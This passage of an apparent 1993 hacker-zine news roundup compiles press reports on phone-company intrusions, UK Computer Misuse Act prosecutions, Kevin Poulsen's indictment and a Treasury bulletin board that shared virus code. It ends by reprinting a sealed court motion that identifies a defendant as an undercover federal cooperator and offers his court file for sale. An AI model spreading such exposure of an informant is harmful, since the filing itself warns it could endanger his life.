but did not get a chance to counterfeit and withdraw money except from a few hundred accounts before it became too dangerous to continue ----------------------------------------------------------------------------- Hacker Gets Jail Time June 5, 1993 ~~~~~~~~~~~~~~~~~~~~~ (Newsday) (Page 13) A Brooklyn College film student, who was part of a group that allegedly broke into computer systems operated by major telephone companies, was sentenced yesterday to 1 year and 1 day in prison. John Lee, 21, of Bedford Stuyvesant, also was sentenced to 200 hours of community service, which Manhattan Federal District Court Judge Richard Owen recommended he spend teaching others to use computers. Lee had pled guilty December 3, 1992, to a conspiracy charge involving computer tampering, fraud and illegal wiretapping. _______________________________________________________________________________ Hacker Gets Prison Term For Phone Computer Tampering June 4, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Gail Appleson (The Reuter Business Report) NEW YORK -- A computer hacker known as "Corrupt" who was part of a group that broke into computer systems operated by major telephone companies was sentenced Friday to one year and one day in prison. The defendant, John Lee, 21, of New York had pleaded guilty December 3, 1992 to a conspiracy charge involving computer tampering, fraud and illegal wiretapping. The indictment alleges the defendants broke into computer switching systems operated by Southwestern Bell, New York Telephone, Pacific Bell, U.S. West and Martin Marietta Electronics Information and Missile Group. Southwestern Bell allegedly lost $370,000 because of the crimes. The defendants also allegedly tampered with systems owned by the nation's largest credit reporting companies including TRW, Trans Union and Information America. They allegedly obtained 176 TRW credit reports on various individuals. The indictment alleged the group broke into the computers "to enhance their image and prestige among other computer hackers and to harass and intimidate rival hackers and other people they did not like." _______________________________________________________________________________ Professional Computer Hackers First To Land In Jail Under New Law June 4, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Nicholas Hills (The Vancouver Sunds)(Page A11) LONDON -- In Brussels, they were celebrated as the two young men who broke the gaudy secrets of EC president Jacques Delors' expense accounts. In Sweden, they were known as the Eight-Legged Groove Machine, bringing down part of the country's telephone network, forcing a highly publicized apology from a government minister who said the chaos was all due to a 'technical fault'. They also broke into various European defense ministry networks, academic systems at Hull University and the financial records of the leading London bankers, S.G. Warburg. No, these weren't two happy-go-lucky burglars; but rather, professional computer hackers, aged 24 and 22, who made legal as well as technological history by being the first offenders of this new trade to be jailed for their crimes under new British law. Neil Woods and Karl Strickland have gone to prison for six months each for penetrating computer systems in 15 different countries. The ease with which they conducted this exercise, and their attitude that they were simply engaging in "intellectual joyriding," has confirmed the worst fears of legal and technological experts that computer hacking in Europe, at least, has become a virtually uncontrollable virus. The case became a cause celebre because of what had happened months before in another courtroom where a teenage computer addict who had hacked into the White House system, the EC, and even the Tokyo Zoo -- using a $400 birthday present from his mother -- had walked free because a jury accepted, basically, that a computer had taken over his mind. The case of 19-year-old Paul Bedworth, who began hacking at the age of 14, and is now studying "artificial intelligence" at Edinburgh University, provides an insight into why hackers have turned the new computer world into an equivalent state of delirium tremens. Bedworth and two young friends caused thousands of dollars worth of damage to computer systems in Britain and abroad. They were charged with criminal conspiracy under the Computer Misuse Act of 1990. Bedworth never did deny computer hacking at his trial, and did not give evidence in his defense. He simply said through his lawyer that there could not have been any criminal intent because of his "pathological obsession" with computers. A jury of eight men and three women unanimously acquitted him. Until the passage of the Computer Misuse Act in 1990, hacking was legal in Britain. Bedworth may have been found not guilty, but his activities were so widespread that the authorities' investigation involved eight different British police forces, and others from as far afield as Finland and Singapore. It produced so much evidence - mostly on disk - that if it had been printed out on ordinary laser printer paper, it is estimated that the material would have reached a height of 42 meters. The police were devastated by the verdict, but are now feeling somewhat better after the conviction of Woods and Strickland. The pair, using the nicknames of Pad and Gandalf, would spend up to six hours a day at their computers, boasting about "smashing" databases. ----------------------------------------------------------------------------- Computers Turned My Boy Into A Robot March 18, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Martin Phillips (Daily Mirror)(Page 1) Connie Bedworth said she was powerless to control the "monster" as he glued himself to the screen nearly 24 hours as day. "He didn't want to eat or sleep--he just couldn't bear to be away from it, " she said. A jury decided Paul Bedworth, now 19, was so "hooked" he could not stop himself hacking in to companies' systems -- allegedly costing them thousands of dollars. ----------------------------------------------------------------------------- Hot For The Fingertips: An Internet Meeting Of Minds May 23, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Frank Bajak (Associated Press) NEW YORK -- Somewhere in the ether and silicon that unite two workstations 11 floors above lower Broadway, denizens of the cyberpunk milieu are feverishly debating whether anyone in government can be trusted. This is the 12-by-20-foot bare-walled home of MindVox, today's recreation hall for the new lost generation's telecomputing crowd. You can enter by phone line or directly off Internet. Patrick Kroupa and Bruce Fancher are the proprietors, self-described former Legion of Doom telephone hackers who cut the cord with computing for a time after mid-1980s teen-age shenanigans. Kroupa is a towering 25-year-old high school dropout in a black leather jacket, with long hair gathered under a gray bandanna, three earrings and a hearty laugh. Fancher is 22 and more businesslike, but equally in love with this dream he left Tufts University for. They've invested more than $80,000 into Mindvox, which went fully operational in November and has more than 2,000 users, who pay $15 to $20 a month plus telephone charges. MindVox aspires to be a younger, harder-edged alternative to the WELL, a fertile 8-year-old watering hole for the mind in Sausalito, California, with more than 7,000 users, including scores of computer age luminaries. One popular feature is a round-table discussion on computer theft and security hosted by a U.S. Treasury agent. The latest hot topic is the ease of breaking into a new flavor of local access network. ----------------------------------------------------------------------------- Hi Girlz, See You In Cyberspace May 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Margie (Sassy Magazine) (Page 79) [Margie hits the net via Mindvox. Along the way she discovers flame wars, sexism, and a noted lack of females online. This is her story. :) ] ----------------------------------------------------------------------------- Hacker Accused of Rigging Radio Contests April 22, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Don Clark (San Francisco Chronicle) A notorious hacker was charged yesterday with using computers to rig promotional contest at three Los Angeles radio stations, in a scheme that allegedly netted two Porsches, $20,000 in cash and at least two trips to Hawaii. Kevin Lee Poulsen, now awaiting trial on earlier federal charges, is accused of conspiring with two other hackers to seize control of incoming phone lines at the radio stations. By making sure that only their calls got through, the conspirators were assured of winning the contests, federal prosecutors said. A new 19-count federal indictment filed in Los Angeles charges that Poulsen also set up his own wire taps and hacked into computers owned by California Department of Motor Vehicles and Pacific Bell. Through the latter, he obtained information about the undercover businesses and wiretaps run by the FBI, the indictment states. Poulsen, 27, is accused of committing the crimes during 17 months on the lam from earlier charges of telecommunications and computers fraud filed in San Jose. He was arrested in April 1991 and is now in the federal Correctional Institution in Dublin. In December, prosecutors added an espionage charge against him for his alleged theft of a classified military document. The indictment announced yesterday adds additional charges of computer and mail fraud, money laundering, interception of wire communications and obstruction of justice. Ronald Mark Austin and Justin Tanner Peterson have pleaded guilty to conspiracy and violating computer crime laws and have agreed to help against Poulsen. Both are Los Angeles residents. Poulsen and Austin have made headlines together before. As teenagers in Los Angeles, the two computer prodigies allegedly broke into a Pentagon-organized computer network that links researchers and defense contractors around the country. ----------------------------------------------------------------------------- SPA Tracks Software Pirates on Internet March 22, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Shawn Willett (InfoWorld)(Page 12) The Software Publishers Association has begun investigating reports of widespread piracy on the Internet, a loose amalgam of thousands of computer networks. The Internet, which began as a Unix-oriented, university-based communi- cations network, now reaches into corporate and government sites in 110 countries and is growing at a rapid pace. The software theft, according to Andrew Patrizio, an editor at the _Software Industry Bulletin_, has been found on certain channels, particularly the warez channel. "People are openly talking about pirating software; there seems to be no one there to monitor it", Patrizio said. A major problem with the Internet is that the "sites" from where the software is being illegally downloaded can physically be located in countries that do not have strong antipiracy laws, such as Italy or the former Soviet Union. The Internet also has no central administrator or system operator. "Policing the entire Internet would be a job", said Peter Beruk, litigation manager for the SPA, in Washington. "My feeling would be to target specific sections that are offering a lot of commercial software free for the download", he said. --------------------------------------------------------------------------- Socialite's Son Will Have To Pay $15,000 To Get His Impounded 1991 BMW Back March 23, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Makeig (Houston Chronicle)(Page 14A) Kenyon Shulman, son of Houston socialite Carolyn Farb will have to pay 15 thousand dollars to get back his 1991 BMW 325i after being impounded when Houston police found 400 doses of the drug ecstasy in its trunk. This is just the latest brush with authorities for Shulman who in 1988 was raided by Harris County authorities for using his personal computer to crack AT&T codes to make free long distance calls. -------------------------------------------------------------------------- Austin Man Gets 10 Years For Computer Theft, Sales May 6, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Jim Phillips (Austin American Statesman)(Page B3) Jason Copson, who was arrested in July under his alias Scott Edward Berry, has been sentenced to 10 years on each of four charges of burglary and one count of assault. The charges will run concurrently. Copson still faces charges in Maryland and Virginia where he served a prison term and was serving probation for dealing in stolen goods. Police arrested Copson and Christopher Lamprecht on July 9 during a sting in which the men tried to sell computer chips stolen from Advanced Micro Devices. --------------------------------------------------------------------------- Treasury Told Computer Virus Secrets June 19, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By: Joel Garreau (Washington Post) (Page A01) For more than a year, computer virus programs that can wreak havoc with computer systems throughout the world were made available by a U.S. government agency to anyone with a home computer and a modem, officials acknowledged this week. At least 1,000 computer users called a Treasury Department telephone number, spokesmen said, and had access to the virus codes by tapping into the department's Automated Information System bulletin board before it was muzzled last month. The bulletin board, run by a security branch of the Bureau of Public Debt in Parkersburg, W.Va., is aimed at professionals whose job it is to combat such malicious destroyers of computer files as "The Internet Worm," "Satan's Little Helper" and "Dark Avenger's Mutation Engine." But nothing blocked anyone else from gaining access to the information. Before the practice was challenged by anonymous whistleblowers, the bulletin board offered "recompilable disassembled virus source code"-that is, programs manipulated to reveal their inner workings. The board also made available hundreds of "hackers' tools"-the cybernetic equivalent of safecracking aids. They included "password cracker" software-various programs that generate huge volumes of letters and numbers until they find the combination that a computer is programmed to recognize as authorizing access to its contents-and "war dialers," which call a vast array of telephone numbers and record those hooked to a computer. The information was intended to educate computer security personnel, according to Treasury spokesmen. "Until you understand how penetration is done, you can't secure your system," said Kim Clancy, the bulletin board's operator. The explosion of computer bulletin boards-dial-up systems that allow users to trade any product that can be expressed in machine-readable zeros and ones-has also added to the ease of virus transmission, computer analysts say. "I am Bulgarian and my country is known as the home of many productive virus writers, but at least our government has never officially distributed viruses," wrote Vesselin Vladimirov Bontchev of the Virus Test Center of the University of Hamburg, Germany. At first, the AIS bulletin board contained only routine security alert postings. But then operator Clancy "began to get underground hacker files and post them on her board," said Bruce Sterling, author of "The Hacker Crackdown: Law and Disorder on the Electronic Frontier." "She amassed a truly impressive collection of underground stuff. If you don't read it, you don't know what's going to hit you." Clancy, 30, who is a former Air Force bomb-squad member, is highly regarded in the computer security world. Sterling, one of the nation's foremost writers about the computer underground, called her "probably the best there is in the federal government who's not military or NSA (National Security Agency). Probably better than most CIA." Clancy, meanwhile, is staying in touch with the underground. In fact, this week, she said, she was "testing a product for some hackers." Before it goes into production, she will review it to find potential bugs. It is a new war dialer called "Tone-Loc." "It's an extremely good tool. Saves me a lot of trouble. It enables me to run a hack against my own phone system faster" to determine points of vulnerability. ----------------------------------------------------------------------------- [AGENT STEAL -- WORKING WITH THE FEDS] IN THE UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF TEXAS DALLAS DIVISION ----------------------------------- THE UNITED STATES OF AMERICA * * V. * CRIMINAL NO. 3-91-194-T * (FILED UNDER SEAL) JUSTIN TANNER PETERSEN (1) * JOINT MOTION TO SEAL COMES NOW the United States of America, by its United States Attorney, at the request of the defendant, and hereby requests that this Honorable Court seal the record in this case. In support thereof, the United States states the following: 1. The case is currently being transferred to the Middle District of California for plea and disposition pursuant to Federal Rule of Criminal Procedure 20; 2. The defendant is released on bond by the United States District Court for the Middle District of California; 3. The defendant, acting in an undercover capacity, currently is cooperating with the United States in the investigation of other persons in California; and 4. The United States believes that the disclosure of the file in this case could jeopardize the aforesaid investigation and possibly the life of the defendant. Consequently, the United States requests that this Honorable Court seal the record in this case. Respectfully submitted, MARVIN COLLINS United States Attorney LEONARD A. SENEROTE Assistant United States Attorney Texas State Bar No. 18024700 1100 Commerce Street, Room 16G28 Dallas, Texas 75242-1699 (214) 767-0951 CERTIFICATE OF CONFERENCE The defendant joins in this motion. LEONARD A. SENEROTE Assistant United States Attorney [The entire file of information gathered from the courts regarding Agent Steal is available from Phrack for $5.00 + $2 postage] -------------------------------------------------------------------------